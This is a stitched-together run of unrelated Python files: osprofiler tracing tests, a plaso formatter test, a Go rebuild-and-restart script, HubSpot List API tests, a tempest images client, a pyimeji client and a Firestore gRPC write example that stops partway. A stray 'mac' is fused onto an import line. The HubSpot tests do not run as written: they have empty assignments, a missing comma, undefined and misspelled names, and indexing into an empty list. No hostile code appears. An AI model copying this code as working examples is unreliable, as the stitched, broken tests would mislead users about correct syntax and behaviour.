    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_duplicate_trace_disallow(self, mock_start, mock_stop):

        @profiler.trace("test")
        def trace_me():
            pass

        self.assertRaises(
            ValueError,
            profiler.trace("test-again", allow_multiple_trace=False),
            trace_me)

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_with_args(self, mock_start, mock_stop):
        self.assertEqual(1, traced_func(1))
        expected_info = {
            "info": "some_info",
            "function": {
                "name": "osprofiler.tests.unit.test_profiler.traced_func",
                "args": str((1,)),
                "kwargs": str({})
            }
        }
        mock_start.assert_called_once_with("function", info=expected_info)
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_without_args(self, mock_start, mock_stop):
        self.assertEqual((1, 2), trace_hide_args_func(1, i=2))
        expected_info = {
            "function": {
                "name": "osprofiler.tests.unit.test_profiler"
                        ".trace_hide_args_func"
            }
        }
        mock_start.assert_called_once_with("hide_args", info=expected_info)
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_with_exception(self, mock_start, mock_stop):

        self.assertRaises(ValueError, test_fn_exc)
        expected_info = {
            "function": {
                "name": "osprofiler.tests.unit.test_profiler.test_fn_exc"
            }
        }
        expected_stop_info = {"etype": "ValueError", "message": ""}
        mock_start.assert_called_once_with("foo", info=expected_info)
        mock_stop.assert_called_once_with(info=expected_stop_info)

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_with_result(self, mock_start, mock_stop):
        self.assertEqual((1, 2), trace_with_result_func(1, i=2))
        start_info = {
            "function": {
                "name": "osprofiler.tests.unit.test_profiler"
                        ".trace_with_result_func",
                "args": str((1,)),
                "kwargs": str({"i": 2})
            }
        }

        stop_info = {
            "function": {
                "result": str((1, 2))
            }
        }
        mock_start.assert_called_once_with("hide_result", info=start_info)
        mock_stop.assert_called_once_with(info=stop_info)


class FakeTracedCls(object):

    def method1(self, a, b, c=10):
        return a + b + c

    def method2(self, d, e):
        return d - e

    def method3(self, g=10, h=20):
        return g * h

    def _method(self, i):
        return i


@profiler.trace_cls("rpc", info={"a": 10})
class FakeTraceClassWithInfo(FakeTracedCls):
    pass


@profiler.trace_cls("a", info={"b": 20}, hide_args=True)
class FakeTraceClassHideArgs(FakeTracedCls):
    pass


@profiler.trace_cls("rpc", trace_private=True)
class FakeTracePrivate(FakeTracedCls):
    pass


class FakeTraceStaticMethodBase(FakeTracedCls):
    @staticmethod
    def static_method(arg):
        return arg


@profiler.trace_cls("rpc", trace_static_methods=True)
class FakeTraceStaticMethod(FakeTraceStaticMethodBase):
    pass


@profiler.trace_cls("rpc")
class FakeTraceStaticMethodSkip(FakeTraceStaticMethodBase):
    pass


class FakeTraceClassMethodBase(FakeTracedCls):
    @classmethod
    def class_method(cls, arg):
        return arg


@profiler.trace_cls("rpc")
class FakeTraceClassMethodSkip(FakeTraceClassMethodBase):
    pass


def py3_info(info):
    # NOTE(boris-42): py33 I hate you.
    info_py3 = copy.deepcopy(info)
    new_name = re.sub("FakeTrace[^.]*", "FakeTracedCls",
                      info_py3["function"]["name"])
    info_py3["function"]["name"] = new_name
    return info_py3


def possible_mock_calls(name, info):
    # NOTE(boris-42): py33 I hate you.
    return [mock.call(name, info=info), mock.call(name, info=py3_info(info))]


class TraceClsDecoratorTestCase(test.TestCase):

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_args(self, mock_start, mock_stop):
        fake_cls = FakeTraceClassWithInfo()
        self.assertEqual(30, fake_cls.method1(5, 15))
        expected_info = {
            "a": 10,
            "function": {
                "name": ("osprofiler.tests.unit.test_profiler"
                         ".FakeTraceClassWithInfo.method1"),
                "args": str((fake_cls, 5, 15)),
                "kwargs": str({})
            }
        }
        self.assertEqual(1, len(mock_start.call_args_list))
        self.assertIn(mock_start.call_args_list[0],
                      possible_mock_calls("rpc", expected_info))
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_kwargs(self, mock_start, mock_stop):
        fake_cls = FakeTraceClassWithInfo()
        self.assertEqual(50, fake_cls.method3(g=5, h=10))
        expected_info = {
            "a": 10,
            "function": {
                "name": ("osprofiler.tests.unit.test_profiler"
                         ".FakeTraceClassWithInfo.method3"),
                "args": str((fake_cls,)),
                "kwargs": str({"g": 5, "h": 10})
            }
        }
        self.assertEqual(1, len(mock_start.call_args_list))
        self.assertIn(mock_start.call_args_list[0],
                      possible_mock_calls("rpc", expected_info))
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_without_private(self, mock_start, mock_stop):
        fake_cls = FakeTraceClassHideArgs()
        self.assertEqual(10, fake_cls._method(10))
        self.assertFalse(mock_start.called)
        self.assertFalse(mock_stop.called)

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_without_args(self, mock_start, mock_stop):
        fake_cls = FakeTraceClassHideArgs()
        self.assertEqual(40, fake_cls.method1(5, 15, c=20))
        expected_info = {
            "b": 20,
            "function": {
                "name": ("osprofiler.tests.unit.test_profiler"
                         ".FakeTraceClassHideArgs.method1"),
            }
        }

        self.assertEqual(1, len(mock_start.call_args_list))
        self.assertIn(mock_start.call_args_list[0],
                      possible_mock_calls("a", expected_info))
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_private_methods(self, mock_start, mock_stop):
        fake_cls = FakeTracePrivate()
        self.assertEqual(5, fake_cls._method(5))

        expected_info = {
            "function": {
                "name": ("osprofiler.tests.unit.test_profiler"
                         ".FakeTracePrivate._method"),
                "args": str((fake_cls, 5)),
                "kwargs": str({})
            }
        }

        self.assertEqual(1, len(mock_start.call_args_list))
        self.assertIn(mock_start.call_args_list[0],
                      possible_mock_calls("rpc", expected_info))
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    @test.testcase.skip(
        "Static method tracing was disabled due the bug. This test should be "
        "skipped until we find the way to address it.")
    def test_static(self, mock_start, mock_stop):
        fake_cls = FakeTraceStaticMethod()

        self.assertEqual(25, fake_cls.static_method(25))

        expected_info = {
            "function": {
                # fixme(boris-42): Static methods are treated differently in
                #                  Python 2.x and Python 3.x. So in PY2 we
                #                  expect to see method4 because method is
                #                  static and doesn't have reference to class
                #                  - and FakeTraceStatic.method4 in PY3
                "name":
                    "osprofiler.tests.unit.test_profiler"
                    ".method4" if six.PY2 else
                    "osprofiler.tests.unit.test_profiler.FakeTraceStatic"
                    ".method4",
                "args": str((25,)),
                "kwargs": str({})
            }
        }

        self.assertEqual(1, len(mock_start.call_args_list))
        self.assertIn(mock_start.call_args_list[0],
                      possible_mock_calls("rpc", expected_info))
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_static_method_skip(self, mock_start, mock_stop):
        self.assertEqual(25, FakeTraceStaticMethodSkip.static_method(25))
        self.assertFalse(mock_start.called)
        self.assertFalse(mock_stop.called)

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_class_method_skip(self, mock_start, mock_stop):
        self.assertEqual("foo", FakeTraceClassMethodSkip.class_method("foo"))
        self.assertFalse(mock_start.called)
        self.assertFalse(mock_stop.called)


@six.add_metaclass(profiler.TracedMeta)
class FakeTraceWithMetaclassBase(object):
    __trace_args__ = {"name": "rpc",
                      "info": {"a": 10}}

    def method1(self, a, b, c=10):
        return a + b + c

    def method2(self, d, e):
        return d - e

    def method3(self, g=10, h=20):
        return g * h

    def _method(self, i):
        return i


class FakeTraceDummy(FakeTraceWithMetaclassBase):
    def method4(self, j):
        return j


class FakeTraceWithMetaclassHideArgs(FakeTraceWithMetaclassBase):
    __trace_args__ = {"name": "a",
                      "info": {"b": 20},
                      "hide_args": True}

    def method5(self, k, l):
        return k + l


class FakeTraceWithMetaclassPrivate(FakeTraceWithMetaclassBase):
    __trace_args__ = {"name": "rpc",
                      "trace_private": True}

    def _new_private_method(self, m):
        return 2 * m


class TraceWithMetaclassTestCase(test.TestCase):

    def test_no_name_exception(self):
        def define_class_with_no_name():
            @six.add_metaclass(profiler.TracedMeta)
            class FakeTraceWithMetaclassNoName(FakeTracedCls):
                pass
        self.assertRaises(TypeError, define_class_with_no_name, 1)

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_args(self, mock_start, mock_stop):
        fake_cls = FakeTraceWithMetaclassBase()
        self.assertEqual(30, fake_cls.method1(5, 15))
        expected_info = {
            "a": 10,
            "function": {
                "name": ("osprofiler.tests.unit.test_profiler"
                         ".FakeTraceWithMetaclassBase.method1"),
                "args": str((fake_cls, 5, 15)),
                "kwargs": str({})
            }
        }
        self.assertEqual(1, len(mock_start.call_args_list))
        self.assertIn(mock_start.call_args_list[0],
                      possible_mock_calls("rpc", expected_info))
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_kwargs(self, mock_start, mock_stop):
        fake_cls = FakeTraceWithMetaclassBase()
        self.assertEqual(50, fake_cls.method3(g=5, h=10))
        expected_info = {
            "a": 10,
            "function": {
                "name": ("osprofiler.tests.unit.test_profiler"
                         ".FakeTraceWithMetaclassBase.method3"),
                "args": str((fake_cls,)),
                "kwargs": str({"g": 5, "h": 10})
            }
        }
        self.assertEqual(1, len(mock_start.call_args_list))
        self.assertIn(mock_start.call_args_list[0],
                      possible_mock_calls("rpc", expected_info))
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_without_private(self, mock_start, mock_stop):
        fake_cls = FakeTraceWithMetaclassHideArgs()
        self.assertEqual(10, fake_cls._method(10))
        self.assertFalse(mock_start.called)
        self.assertFalse(mock_stop.called)

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_without_args(self, mock_start, mock_stop):
        fake_cls = FakeTraceWithMetaclassHideArgs()
        self.assertEqual(20, fake_cls.method5(5, 15))
        expected_info = {
            "b": 20,
            "function": {
                "name": ("osprofiler.tests.unit.test_profiler"
                         ".FakeTraceWithMetaclassHideArgs.method5")
            }
        }

        self.assertEqual(1, len(mock_start.call_args_list))
        self.assertIn(mock_start.call_args_list[0],
                      possible_mock_calls("a", expected_info))
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_private_methods(self, mock_start, mock_stop):
        fake_cls = FakeTraceWithMetaclassPrivate()
        self.assertEqual(10, fake_cls._new_private_method(5))

        expected_info = {
            "function": {
                "name": ("osprofiler.tests.unit.test_profiler"
                         ".FakeTraceWithMetaclassPrivate._new_private_method"),
                "args": str((fake_cls, 5)),
                "kwargs": str({})
            }
        }

        self.assertEqual(1, len(mock_start.call_args_list))
        self.assertIn(mock_start.call_args_list[0],
                      possible_mock_calls("rpc", expected_info))
        mock_stop.assert_called_once_with()

#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the Google Chrome Cache files event formatter."""

import unittest

from plaso.formatters import chrome_cache

from tests.formatters import test_lib


class ChromeCacheEntryEventFormatterTest(test_lib.EventFormatterTestCase):
  """Tests for the Chrome Cache entry event formatter."""

  def testInitialization(self):
    """Tests the initialization."""
    event_formatter = chrome_cache.ChromeCacheEntryEventFormatter()
    self.assertIsNotNone(event_formatter)

  def testGetFormatStringAttributeNames(self):
    """Tests the GetFormatStringAttributeNames function."""
    event_formatter = chrome_cache.ChromeCacheEntryEventFormatter()

    expected_attribute_names = [u'original_url']

    self._TestGetFormatStringAttributeNames(
        event_formatter, expected_attribute_names)

  # TODO: add test for GetMessages.


if __name__ == '__main__':
  unittest.main()

macimport os
import subprocess

name = "gobuildmaster"

current_hash = ""
for line in os.popen("md5sum " + name).readlines():
    current_hash = line.split(' ')[0]
    
# Move the old version over
for line in os.popen('cp ' + name + ' old' + name).readlines():
    print line.strip()

# Rebuild
for line in os.popen('go build').readlines():
    print line.strip()

size_1 = os.path.getsize('./old' + name)
size_2 = os.path.getsize('./' + name)

lines = os.popen('ps -ef | grep ' + name).readlines()
running = False
for line in lines:
    if "./" + name in line:
        running = True

new_hash = ""
for line in os.popen("md5sum " + name).readlines():
    new_hash = line.split(' ')[0]

              
if size_1 != size_2 or new_hash != current_hash or not running:
    if not running:
        for line in os.popen('cat out.txt | mail -E -s "Crash Report ' + name + '" brotherlogic@gmail.com').readlines():
            pass
    for line in os.popen('echo "" > out.txt').readlines():
        pass
    for line in os.popen('killall ' + name).readlines():
        pass
    subprocess.Popen(['./' + name])

import unittest2
import helper
import simplejson as json
from nose.plugins.attrib import attr

PORTAL_ID = 62515

class ListsClientTest(unittest2.TestCase):
    """
    Unit tests for the HubSpot List API Python wrapper (hapipy) client.

    This file contains some unittest tests for the List API.

    Questions, comments, etc: http://developers.hubspot.com
    """
    def setUp(self):
        self.client = ListsClient(**helper.get_options())

    def tearDown(self):
        pass

    @attr('api')
    def test_get_list(self):
        # create a list to get
        dummy_data = json.dumps(dict(
            name='try_and_get_me',
            dynamic=False,
            portalId=PORTAL_ID
        ))

        created_list = self.client.create_list(dummy_data)

        # make sure it was created
        self.asserTrue(len(created_list['lists']))

        # the id number of the list the test is trying to get
        id_to_get = created_list['listID']

        # try and get it
        recieved_lists = self.client.get_list(id_to_get)

        # see if the test got the right list
        self.assertEqual(recieved_lists['lists'][0]['listId'], created_list['listId'])

        print "Got this list: %s" % json.dumps(recieved_list['lists'][0])

        # clean up
        self.client.delete_list(id_to_get)

    @attr('api')
    def test_get_batch_lists(self):
        # holds the ids of the lists being retrieved
        list_ids = []

        # make a list to get
        dummy_data = json.dumps(dict(
            name='first_test_list',
            dynamic=False,
            portalId=PORTAL_ID
        ))

        created_list = self.client.create_list(dummy_data)

        # make sure it was actually made
        self.assertTrue(created_list['listID'])

        # put the id of the newly made list in list_ids
        list_ids[0] = created_list['listId']

        #change the data a little and make another list
        dummy_data['name'] = 'second_test_list'

        created_list = self.client.create_list(dummy_data)

        # make sure itwas actually made
        self.assertTrue(created_list['listID'])

        # put the id number in list_ids
        list_ids[1] = created_list['listId']

        # try and get them
        batch_lists = self.client.get_batch_lists(list_ids)

        # make sure you got as many lists as you were searching for
        self.assertEqual(len(list_ids), len(batch_lists['lists']))

        # clean up
        self.client.delete_list(list_ids[0])
        self.client.delete_list(list_ids[1])

    @attr('api')
    def test_get_lists(self):
        # try and get lists
        recieved_lists = self.client.get_lists()

        # see if the test got at least one
        if len(recieved_lists['lists']) == 0:
            self.fail("Unable to retrieve any lists")
        else:
            print "Got these lists %s" % json.dumps(recieved_lists)

    @attr('api')
    def test_get_static_lists(self):
        # create a static list to get
        dummy_data = json.dumps(dict(
            name='static_test_list',
            dynamic=False,
            portalId=PORTAL_ID
        ))

        created_list = self.client.create_list(dummy_data)

        # make sure it was actually made
        self.assertTrue(created_list['listID'])

        # this call will return 20 lists if not given another value
        static_lists = self.client.get_static_lists()

        if len(static_lists['lists']) == 0:
            self.fail("Unable to retrieve any static lists")
        else:
            print "Found these static lists: %s" % json.dumps(static_lists)

            # clean up
            self.client.delete_list(created_list['listId'])

    @attr('api')
    def test_get_dynamic_lists(self):
        # make a dynamic list to get
        dummy_data = json.dumps(dict(
            name='test_dynamic_list',
            dynamic=True,
            portalId=PORTAL_ID
        ))

        created_list = self.client.create_list(dummy_data)

        # make sure the dynamic list was made
        self.assertTrue(created_list['listId'])

        dynamic_lists = self.client.get_dynamic_lists()

        if len(dynamic_lists['lists']) == 0:
            self.fail("Unable to retrieve any dynamic lists")
        else:
            print "Found these dynamic lists: %s" % json.dumps(dynamic_lists)

            # clean up
            self.client.delete_list(created_list['listId'])

    @attr('api')
    def test_get_list_contacts(self):
        # the id number of the list you want the contacts of
        # which_list =

        # try and get the contacts
        contacts = self.client.get_list_contacts(which_list)

        # make sure you get at least one
        self.assertTrue(len(contacts['contacts'])

        print "Got these contacts: %s from this list: %s" % json.dumps(contacts), which_list)

    @attr('api')
    def test_get_list_contacts_recent(self):
        # the id number of the list you want the recent contacts of
        which_list =

        recent_contacts = self.client.get_list_contacts_recent(which_list)

        if len(recent_contacts['lists']) == 0:
            self.fail("Did not find any recent contacts")
        else:
            print "Found these recent contacts: %s" % json.dumps(recent_conacts)

    @attr('api')
    def test_create_list(self):
        # the data for the list the test is making
        dummy_data = json.dumps(dict(
            list_name='test_list',
            dynamic=False,
            portalId=PORTAL_ID
        ))

        # try and make the list
        created_list = self.client.create_list(dummy_data)

        # make sure it was created
        if len(created_lists['lists']) == 0:
            self.fail("Did not create the list")
        else:
            print "Created this list: %s" % json.dumps(created_lists)

            # clean up
            self.client.delete_list(created_lists['lists'][0]['listId'])

    @attr('api')
    def test_update_list(self):
        # make a list to update
        dummy_data = json.dumps(dict(
            name='delete_me',
            dynamic=False,
            portalId=PORTAL_ID
        ))

        created_list = self.client.create_list(dummy_data)

        # make sure it was actually made
        self.assertTrue(len(created_list['listId']))

        # get the id number of the list
        update_list_id = created_list['listId']

        # this is the data updating the list
        update_data = json.dumps(dict(
            list_name='really_delete_me',
        ))

        # try and do the update
        http_response = self.client.update_list(update_list_id, update_data)

        if http_response >= 400:
            self.fail("Unable to update list!")
        else:
            print("Updated a list!")

        # clean up
        self.client.delete_list(update_list_id)

    @attr('api')
    def test_add_contacts_to_list_from_emails(self):
        # make a list to add contacts to
        dummy_data = json.dumps(dict(
            name='give_me_contact_emails',
            dynamic=False,
            portalId=PORTAL_ID
        ))

        created_list = self.client.create_list(dummy_data)

        # make sure it was actually made
        self.assertTrue(len(created_list['lists']))

        # the id number of the list being added to
        which_list = created_list['listId']

        # the emails of the contacts being added
        emails = json.dumps(dict(
            emails
        ))

        # try and add the contacts
        self.client.add_contacts_to_list_from_emails(which_list, emails)

    @attr('api')
    def test_add_contact_to_list(self):
        # make a list to add a contact to
        dummy_data = json.dumps(dict(
            name='add_a_contact',
            dynamic=False,
            portalId=PORTAL_ID
        ))

        created_list = self.client.create_list(dummy_data)

        # make sure it was actually made
        self.assertTrue(created_list['listId'])

        # the id number of the list the contact is being added to
        which_list = created_list['listId']

        # the id number of the contact being added to the list
        which_contact =

        added = self.client.add_contact_to_list(which_list, which_contact)

        if added['updated'] == which_contact:
            print "Succesfully added contact: %s to list: %s" % which_contact, which_list

            # if it worked, clean up
            self.client.delete_list(which_list)

        else:
            self.fail("Did not add contact: %s to list: %a" % which_contact, which_list)

    @attr('api')
    def test_remove_contact_from_list(self):
        # make a list to remove a contact from
        fake_data = json.dumps(dict(
            name='remove_this_contact'
            dynamic=False,
            portalId=PORTAL_ID
        ))

        created_list = self.client.create_list(fake_data)

        # make sure it was actually made
        self.assertTrue(created_list['listId'])

        # the id number of the list the contact is being deleted from
        which_list = created_list['listId']

        # the id number of the contact being deleted
        which_contact =

        # put the contact in the list so it can be removed
        added = self.client.add_contact_to_list(which_list, which_contact)

        # make sure it was added
        self.assertTrue(added['updated'])

        # try and remove it
        removed = self.client.remove_contact_from_list(which_list, which_contact)

        # check if it was actually removed
        if removed['updated'] == which_contact:
            print "Succesfully removed contact: %s from list: %s" % which_contact, which_list

            # clean up
            self.client.delete_list(created_list['listId'])
        else:
            self.fail("Did not remove contact %s from list: %s" % which_contact, which_list)

    @attr('api')
    def test_delete_list(self):
        # make a list to delete
        dummy_data = json.dumps(dict(
            name='should_be_deleted',
            dynamic=False,
            portalId=PORTAL_ID

        ))

        created_list = self.client.create_list(dummy_data)

        # check if it was actually made
        self.assertTrue(created_list['listId'])

        # the id number of the list being deleted
        id_to_delete = created_list['listId']

        # try deleting it
        self.client.delete_list(id_to_delete)

        # try and get the list that should have been deleted
        check = self.client.get_list(id_to_delete)

        # check should not have any lists
        self.assertEqual(len(check['lists']), 0)

        print "Sucessfully deleted a test list"

    @attr('api')
    def test_refresh_list(self):
        # make a dynamic list to refresh
        dummy_data = json.dumps(dict(
            name='refresh_this_list',
            dynamic=True,
            portalId=PORTAL_ID
        ))

        created_list = self.client.create_list(dummy_data)

        # make sure it actually made the list
        self.assertTrue(created_list['listId'])

        # do the refresh
        refresh_response = self.client.refresh_list(created_list['listId'])

        # check if it worked
        if refresh_response >= 400:
            self.fail("Failed to refresh list: %s" % json.dumps(created_list))
        else:
            print "Succesfully refreshed list: %s" % json.dumps(created_list)

            # clean up
            self.client.delete_list(created_list['listId'])

if __name__ == "__main__":
    unittest2.main()

# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import json

from six.moves.urllib import parse as urllib
from tempest_lib import exceptions as lib_exc

from tempest.api_schema.response.compute.v2_1 import images as schema
from tempest.common import service_client
from tempest.common import waiters


class ImagesClientJSON(service_client.ServiceClient):

    def create_image(self, server_id, name, meta=None):
        """Creates an image of the original server."""

        post_body = {
            'createImage': {
                'name': name,
            }
        }

        if meta is not None:
            post_body['createImage']['metadata'] = meta

        post_body = json.dumps(post_body)
        resp, body = self.post('servers/%s/action' % str(server_id),
                               post_body)
        self.validate_response(schema.create_image, resp, body)
        return service_client.ResponseBody(resp, body)

    def list_images(self, params=None):
        """Returns a list of all images filtered by any parameters."""
        url = 'images'
        if params:
            url += '?%s' % urllib.urlencode(params)

        resp, body = self.get(url)
        body = json.loads(body)
        self.validate_response(schema.list_images, resp, body)
        return service_client.ResponseBodyList(resp, body['images'])

    def list_images_with_detail(self, params=None):
        """Returns a detailed list of images filtered by any parameters."""
        url = 'images/detail'
        if params:
            url += '?%s' % urllib.urlencode(params)

        resp, body = self.get(url)
        body = json.loads(body)
        self.validate_response(schema.list_images_details, resp, body)
        return service_client.ResponseBodyList(resp, body['images'])

    def show_image(self, image_id):
        """Returns the details of a single image."""
        resp, body = self.get("images/%s" % str(image_id))
        self.expected_success(200, resp.status)
        body = json.loads(body)
        self.validate_response(schema.get_image, resp, body)
        return service_client.ResponseBody(resp, body['image'])

    def delete_image(self, image_id):
        """Deletes the provided image."""
        resp, body = self.delete("images/%s" % str(image_id))
        self.validate_response(schema.delete, resp, body)
        return service_client.ResponseBody(resp, body)

    def wait_for_image_status(self, image_id, status):
        """Waits for an image to reach a given status."""
        waiters.wait_for_image_status(self, image_id, status)

    def list_image_metadata(self, image_id):
        """Lists all metadata items for an image."""
        resp, body = self.get("images/%s/metadata" % str(image_id))
        body = json.loads(body)
        self.validate_response(schema.image_metadata, resp, body)
        return service_client.ResponseBody(resp, body['metadata'])

    def set_image_metadata(self, image_id, meta):
        """Sets the metadata for an image."""
        post_body = json.dumps({'metadata': meta})
        resp, body = self.put('images/%s/metadata' % str(image_id), post_body)
        body = json.loads(body)
        self.validate_response(schema.image_metadata, resp, body)
        return service_client.ResponseBody(resp, body['metadata'])

    def update_image_metadata(self, image_id, meta):
        """Updates the metadata for an image."""
        post_body = json.dumps({'metadata': meta})
        resp, body = self.post('images/%s/metadata' % str(image_id), post_body)
        body = json.loads(body)
        self.validate_response(schema.image_metadata, resp, body)
        return service_client.ResponseBody(resp, body['metadata'])

    def get_image_metadata_item(self, image_id, key):
        """Returns the value for a specific image metadata key."""
        resp, body = self.get("images/%s/metadata/%s" % (str(image_id), key))
        body = json.loads(body)
        self.validate_response(schema.image_meta_item, resp, body)
        return service_client.ResponseBody(resp, body['meta'])

    def set_image_metadata_item(self, image_id, key, meta):
        """Sets the value for a specific image metadata key."""
        post_body = json.dumps({'meta': meta})
        resp, body = self.put('images/%s/metadata/%s' % (str(image_id), key),
                              post_body)
        body = json.loads(body)
        self.validate_response(schema.image_meta_item, resp, body)
        return service_client.ResponseBody(resp, body['meta'])

    def delete_image_metadata_item(self, image_id, key):
        """Deletes a single image metadata key/value pair."""
        resp, body = self.delete("images/%s/metadata/%s" %
                                 (str(image_id), key))
        self.validate_response(schema.delete, resp, body)
        return service_client.ResponseBody(resp, body)

    def is_resource_deleted(self, id):
        try:
            self.show_image(id)
        except lib_exc.NotFound:
            return True
        return False

    @property
    def resource_type(self):
        """Returns the primary type of resource this client works with."""
        return 'image'

"""A client for the REST API of imeji instances."""
import logging
from collections import OrderedDict

import requests
from six import string_types

from pyimeji import resource
from pyimeji.config import Config


log = logging.getLogger(__name__)


class ImejiError(Exception):
    def __init__(self, message, error):
        super(ImejiError, self).__init__(message)
        self.error = error.get('error') if isinstance(error, dict) else error


class GET(object):
    """Handle GET requests.

    This includes requests

    - to retrieve single objects,
    - to fetch lists of object references (which are returned as `OrderedDict` mapping
      object `id` to additional metadata present in the response).
    """
    def __init__(self, api, name):
        """Initialize a handler.

        :param api: An Imeji API instance.
        :param name: Name specifying the kind of object(s) to retrieve. We check whether\
        this name has a plural "s" to determine if a list is to be retrieved.
        """
        self._list = name.endswith('s')
        self.rsc = getattr(resource, (name[:-1] if self._list else name).capitalize())
        self.api = api
        self.name = name
        self.path = name
        if not self._list:
            self.path += 's'

    def __call__(self, id='', **kw):
        """Calling the handler initiates an HTTP request to the imeji server.

        :param id: If a single object is to be retrieved it must be specified by id.
        :return: An OrderedDict mapping id to additional metadata for lists, a \
        :py:class:`pyimeji.resource.Resource` instance for single objects.
        """
        if not self._list and not id:
            raise ValueError('no id given')
        if id:
            id = '/' + id
        res = self.api._req('/%s%s' % (self.path, id), params=kw)
        if not self._list:
            return self.rsc(res, self.api)
        return OrderedDict([(d['id'], d) for d in res])


class Imeji(object):
    """The client.

    >>> api = Imeji(service_url='http://demo.imeji.org/imeji/')
    >>> collection_id = list(api.collections().keys())[0]
    >>> collection = api.collection(collection_id)
    >>> collection = api.create('collection', title='the new collection')
    >>> item = collection.add_item(fetchUrl='http://example.org')
    >>> item.delete()
    """
    def __init__(self, cfg=None, service_url=None):
        self.cfg = cfg or Config()
        self.service_url = service_url or self.cfg.get('service', 'url')
        user = self.cfg.get('service', 'user', default=None)
        password = self.cfg.get('service', 'password', default=None)
        self.session = requests.Session()
        if user and password:
            self.session.auth = (user, password)

    def _req(self, path, method='get', json=True, assert_status=200, **kw):
        """Make a request to the API of an imeji instance.

        :param path: HTTP path.
        :param method: HTTP method.
        :param json: Flag signalling whether the response should be treated as JSON.
        :param assert_status: Expected HTTP response status of a successful request.
        :param kw: Additional keyword parameters will be handed through to the \
        appropriate function of the requests library.
        :return: The return value of the function of the requests library or a decoded \
        JSON object/array.
        """
        method = getattr(self.session, method.lower())
        res = method(self.service_url + '/rest' + path, **kw)
        status_code = res.status_code
        if json:
            try:
                res = res.json()
            except ValueError:  # pragma: no cover
                log.error(res.text[:1000])
                raise
        if assert_status:
            if status_code != assert_status:
                log.error(
                    'got HTTP %s, expected HTTP %s' % (status_code, assert_status))
                log.error(res.text[:1000] if hasattr(res, 'text') else res)
                raise ImejiError('Unexpected HTTP status code', res)
        return res

    def __getattr__(self, name):
        """Names of resource classes are accepted and resolved as dynamic attribute names.

        This allows convenient retrieval of resources as api.<resource-class>(id=<id>),
        or api.<resource-class>s(q='x').
        """
        return GET(self, name)

    def create(self, rsc, **kw):
        if isinstance(rsc, string_types):
            cls = getattr(resource, rsc.capitalize())
            rsc = cls(kw, self)
        return rsc.save()

    def delete(self, rsc):
        return rsc.delete()

    def update(self, rsc, **kw):
        for k, v in kw.items():
            setattr(rsc, k, v)
        return rsc.save()

#! /usr/bin/python
import sys
import os
import json
import grpc
import time
import subprocess

from google.oauth2 import service_account
import google.oauth2.credentials
import google.auth.transport.requests
import google.auth.transport.grpc

from google.firestore.v1beta1 import firestore_pb2
from google.firestore.v1beta1 import firestore_pb2_grpc
from google.firestore.v1beta1 import document_pb2
from google.firestore.v1beta1 import document_pb2_grpc
from google.firestore.v1beta1 import common_pb2
from google.firestore.v1beta1 import common_pb2_grpc
from google.firestore.v1beta1 import write_pb2
from google.firestore.v1beta1 import write_pb2_grpc
from google.protobuf import empty_pb2
from google.protobuf import timestamp_pb2

   
def first_message(database, write):
    messages = [
            firestore_pb2.WriteRequest(database = database, writes = [])
    ]
    for msg in messages:
            yield msg

def generate_messages(database, writes, stream_id, stream_token):
    # writes can be an array and append to the messages, so it can write multiple Write
    # here just write one as example
    messages = [
            firestore_pb2.WriteRequest(database=database, writes = []),
            firestore_pb2.WriteRequest(database=database, writes = [writes],  stream_id = stream_id, stream_token = stream_token) 
    ]
    for msg in messages:
            yield msg




def main():


   fl = os.path.dirname(os.path.abspath(__file__))
   fn = os.path.join(fl, 'grpc.json')

   with open(fn) as grpc_file:
          
            item = json.load(grpc_file)

            creds = item["grpc"]["Write"]["credentials"]

            credentials = service_account.Credentials.from_service_account_file("{}".format(creds))
            scoped_credentials = credentials.with_scopes(['https://www.googleapis.com/auth/datastore'])
            http_request = google.auth.transport.requests.Request()
            channel = google.auth.transport.grpc.secure_authorized_channel(scoped_credentials, http_request, 'firestore.googleapis.com:443')

            stub = firestore_pb2_grpc.FirestoreStub(channel)
            
            database = item["grpc"]["Write"]["database"]
            name = item["grpc"]["Write"]["name"]
            first_write = write_pb2.Write()

            responses = stub.Write(first_message(database, first_write))
            for response in responses:
                print("Received message %s" % (response.stream_id))
                print(response.stream_token)

